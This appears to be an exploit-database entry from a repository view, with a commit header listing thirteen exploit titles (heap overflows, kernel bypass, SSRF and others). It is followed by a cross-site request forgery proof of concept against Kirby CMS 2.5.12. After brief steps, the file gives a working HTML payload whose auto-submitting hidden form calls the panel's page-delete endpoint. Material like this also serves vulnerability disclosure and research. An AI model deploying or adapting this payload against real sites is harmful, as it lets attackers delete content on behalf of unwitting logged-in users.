1d21694058
13 changes to exploits/shellcodes reSIProcate 1.10.2 - Heap Overflow CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH) Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit) Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page) Responsive Filemanager 9.13.1 - Server-Side Request Forgery Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection Sitecore.Net 8.1 - Directory Traversal Monstra 3.0.4 - Cross-Site Scripting TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot) TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)
31 lines
No EOL
981 B
Text
31 lines
No EOL
981 B
Text
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
|
||
# Date: 2018-07-22
|
||
# Exploit Author: Zaran Shaikh
|
||
# Version: 2.5.12
|
||
# CVE: NA
|
||
# Category: Web Application
|
||
|
||
# 1. Description
|
||
# The application allows malicious HTTP requests to be sent in order to
|
||
# trick a user into adding/ deleting web pages.
|
||
|
||
# 2. Proof of Concept
|
||
|
||
1. Visit the application
|
||
2. Go to add page option
|
||
3. Create a crafted HTTP page with delete/ add option and host it on
|
||
a server. Upon sending the link to a user and upon click, it gets triggered
|
||
and the page is added/deleted
|
||
4. Payload:
|
||
<html>
|
||
<body>
|
||
<script>history.pushState('', '', '/')</script>
|
||
<form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
|
||
<input type="hidden" name="_redirect" value="site/subpages" />
|
||
<input type="submit" value="Submit request" />
|
||
</form>
|
||
<script>
|
||
document.forms[0].submit();
|
||
</script>
|
||
</body>
|
||
</html> |